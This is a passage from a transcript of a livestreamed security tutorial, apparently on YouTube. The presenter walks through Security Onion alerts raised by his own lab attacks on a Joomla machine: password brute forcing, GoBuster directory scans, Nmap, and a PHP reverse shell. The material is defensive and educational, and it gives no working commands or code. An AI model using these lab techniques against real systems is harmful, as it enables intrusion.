here's the alerts. And Nmap was caught here. And as you can see, this is the password in clear text. I think we looked at this earlier, but we can filter here by that event alone, just to see, hey, what was happening? Who was sending passwords in clear text in my network? Now we're playing dumb, we're acting as if we don't know what we did. Just in case we didn't know, it's a potential violation of sending passwords in plain text. 158 events from 192.168.38.133, which is Kali, to our victim machine. What was happening? They were going to port 80 all this time. Let's pick one. We should see a password that was sent in plain text in the network data decoded here. And the password that they tried is here. If we go to our password list that we created, this word here was in there. Let's look at a different one and see what the other password that was tried was. This should be a different one. Password was categorized. So remember, it's a website, so it was said uncategorized or whatever categorized. So this is another word that we tried. So from this we can tell they're changing a password field. And as an analyst now, you're saying, oh, they're brute forcing, obviously, because every request is going to the Joomla administrator index file, and they're changing the username. And in this case, password was user. They're just brute forcing. So that's what we see from here. And if you want to be really detailed, right, we're looking at the timestamp. Timestamps become very important. So make sure that your lab has a nice NTP server that's running. Make sure that you can correlate these things. Source and destination. You might even get, these are called some goodies. I call them goodies, but these are sort of like evidence gathering pretty much. You're like, hey, here's the network community ID if your environment uses this for identifying, or here's the hash, whatever you use to do this. Then if you're interested in the rules, you can read more about how they created the rule from here. So that's just one. Passwords in clear text. If you remove it here, we can go back to our events. Let's check another one and see what happened. Python access attempt. This generated 39 events. What are we talking about here? We did run, my Python simple HTTP server didn't actually complete. But let's look at this. I have more than 1 million events in here, so I'm expecting this to take a little longer. And I can save myself some time if I can put this to the last hour or so. All right, now we can filter using this one. All right, and as we expected, it's a web application attack from Kali Linux to our machine. And we're going to port 80. What was this time? It was a get. It's our friend GoBuster. So this time GoBuster got classified as a Python access. It's because we ran GoBuster from the terminal. That's why it got caught. We ran it from the terminal, and the terminal one uses Python. That's why it did this. When you run GoBuster from the other one, the graphical user interface, it gets caught differently. I think you have seen that before. And this time it's GoBuster. So 39 times we were brute forcing some directories using a word list somewhere. And that's what happened here. And look at the list here. of get stuff. Get code by name. All right, so that's what GoBuster looks like when somebody's brute forcing your directories, at least in this interface. You can do all this stuff in here in Security Onion in the Hunt interface. I'm just a little familiar with Kibana because I've made so many videos with this channel on Kibana and stuff like that. You've seen me, so I like to go there. But here we can also group all these things. You can see that the biggest one was the password, then followed by this user agent, followed by Nmap, Python access. Let's see more here. Okay, you see, it even found the Joomla one that we did here. And guess who got caught? Our web crawler, Serial or whatever that tool is called. When we were making a word list, we got caught right here. So this is interesting stuff. All right, so that's what we have here. And if you want to spend more time on this, you can. I just wanted to show you what you can do with it. And if you just pick one of these, let's see if we picked this one. Oh yeah, this is a good one. This is our reverse shell. You see this port 888? But no, let's see. I didn't use port 888 for the final one, did I? What did I do with port 888? Let's go find out. If you want to find out from here, you can click down here and you'll see the same information. Oh, there we go. This is when we got our www data. This is when we put our PHP reverse shell in the web browser. This is what it looks like. So remember when we went to the site and we abused it and we got www data right here. If you wanted this as evidence, you can say show event pcap. Then you can attach this pcap to other people, but here is your full TCP stuff now. TCP reverse handshakes for those people who enjoy pcap better than other stuff. This is where you're like, wait a second, who initiated this? Okay, so you see that our source was from this site on this port. Destination port was 888. And so this is the connection from our Joomla site to my Kali Linux, giving me shell as www data. And I hope you can see how fun this can be. This is just a few of these things that we found out, and you can see it in plain text in front of you. So when you go to the real world and you are now investigating these events, at least when you see this type of data and the way it's presented here, it doesn't look too foreign. And I'll tell you that the pcap that we're reading here, this looks pretty much like what you would see in a production environment. All right, so that's what we have here. I just wanted to check this. Quick before we call this quits. I didn't see the last reverse shell that I got in here. I saw it by port. I didn't see it. I don't know why it didn't show up here. But I think this is good. All right, so thank you very much for being here, guys. I appreciate each and every one of you. We are way past our time, but I think we learned a lot today. And as you can see, I have a lot to learn as well. And I'm hoping to improve, especially with my Nano game. Damn Nano. All right, that's it from me. Like, subscribe, become a member. One announcement that I have before I go. I set up this lab that you're seeing here in Microsoft Azure. It's working in Azure. If people are interested in following along as I do it, I will give you access to the full lab. I'll put the machine in there. It's pretty much the same. It's a beefy machine with security onion and everything. Azure is very cheap. So if you want, let me know. We can see how much you can pay, because I have to pay Azure. It's very cheap though an hour. I'm using Azure Labs. So if people are interested in following along and don't have time to set it up, I can give you access to this same exact environment with Kali Linux machine, security onion, and the victim machine. It's super easy to set up. I can spin up as many as I want in Azure. So if 100 people want to access it, I'll give you access to it. So let me know if you're interested in that. If you are a channel member, just email me. I will be able to give you access for tomorrow or Sunday's live stream, and then you can follow along. Otherwise, wait a minute here for any questions, or we can call it a night. Let me see if I missed something here. So many options from people. That's nice. All right. Thank you very much, guys. Have a good night. I'll see you later.